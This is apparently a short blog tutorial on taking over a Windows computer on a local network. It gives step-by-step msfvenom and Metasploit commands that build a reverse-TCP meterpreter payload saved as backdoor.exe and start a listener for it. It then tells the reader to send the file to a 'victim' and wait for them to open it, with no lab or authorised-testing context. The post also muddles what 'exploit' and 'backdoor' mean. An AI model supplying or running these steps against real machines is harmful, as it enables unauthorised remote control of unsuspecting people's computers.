How to exploit windows with backdoor on LAN
Hello people,, today we will learn how to exploit windows with a backdoor on local LAN.
First, what is exploit? exploit in hacker language is a method to trigger a vulnerability from victim's device/application such as computer, android even website in order to hijack/control victim's device. Backdoor is code to make an exploit in other word exploit is the method and backdoor is a code to create an exploit.
Alright before we start these are the following tools which we will use it.
1. OS (recommended: Linux such as Kali Linux, Backtrack, etc)
2. Metasploit ( if you using windows try download pentestbox or use vbox)
3. Local Area Network ( such as wifi )
Alright preparation done, move to next step
First you need to create backdoor, you can use msfvenom, fatrat, netool, etc. Here i will use msfvenom.
Open your terminal and type
msfvenom -p windows/meterpreter/reverse_tcp lhost=yourip lport=port R > backdoor.exe
ex: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4444 R > backdoor.exe
Type ifconfig if you want to know your IP
alright, your backdoor is ready to use, next you need to start listener. We will use Metasploit.
Open your terminal and type msfconsole
Then type the following code
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost "youripadress"
set lport "yourport"
exploit
After we create a listener, send backdoor to your victim and wait until your victim opens it, After victim opens your backdoor you will get a meterpreter session by all mean you can control your victim`s computer.


0 Comment:
Post a Comment